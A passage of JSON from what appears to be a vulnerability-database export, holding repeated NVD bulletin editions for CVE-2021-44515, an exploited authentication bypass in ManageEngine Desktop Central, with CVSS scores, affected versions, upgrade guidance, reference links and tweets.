"CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T04:25:45"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T04:55:36", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 47}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T04:57:04", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T04:57:04"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T04:57:04", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 48}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T05:25:37", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T04:57:04"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T05:25:37", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 49}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T05:25:45", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T04:57:04"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T05:25:45", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 50}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T05:26:37", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T05:26:37"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": 